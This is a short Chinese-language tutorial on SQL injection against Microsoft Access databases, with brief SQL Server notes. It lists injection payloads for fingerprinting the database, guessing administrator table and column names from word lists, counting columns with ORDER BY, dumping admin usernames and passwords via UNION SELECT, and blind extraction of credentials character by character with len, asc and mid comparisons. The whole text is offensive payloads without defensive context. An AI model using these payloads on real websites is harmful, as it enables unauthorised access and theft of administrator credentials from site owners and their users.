Access数据库注入详解 一:判断数据库:1.access:and exists (select * from msysobjects)>0 2.Sqlserver:and exists (select * from sysobjects)>0 二:判断数据库中的表:and exsits (select * from admin_user) //最后的admin_user是表名 常见access数据库的管理员表名 admin admin_user admin_msg admin_usr admin_login username mangager mangag msg_user mag_login useradmin user_msg userlogin users member !!! 三 判断数据表中的列:and exsits (select admin from admin) //最后的admin_user是表名,中间的admin是列名。 常见的管理员表下的列名 admin admin_user admin_login users usr user_login user_name name loginame msg_name!!! 常见的密码列名 password pwd pass user_pass 四 查找列数: order by 7 //最后7为列数,当 order by >= 7 的时候会返回页面 联合查询:union select 1,2,3,4,5,6,7from admin//order by查到多少列就写多少列 admin是表名 五:爆表中列的数据: union select 1,2,admin,4,password,5,6,7 from admin 六 :判断账户密码的长度 1 and (select len(admin) from admin)= 5//如果返回正常说明管理员账户长度为5; 2 and (select len(password)from admin)= 5//猜解管理密码是否为5; 七:猜解管理员账号的第一个数据,通过判断ascii码来判断 and (select top 1 asc(mid(admin,1,1)) from admin)=97 返回正常说明等于97 97对应的字母为a 判断管理员账户的第二数据 and (select top 1 asc(mid(admin,2,1)) from admin)>100 以此类推 and (select top 1 asc(mid(password,1,1)) from admin)>100 返回正常说明大于,不正常说明不大于
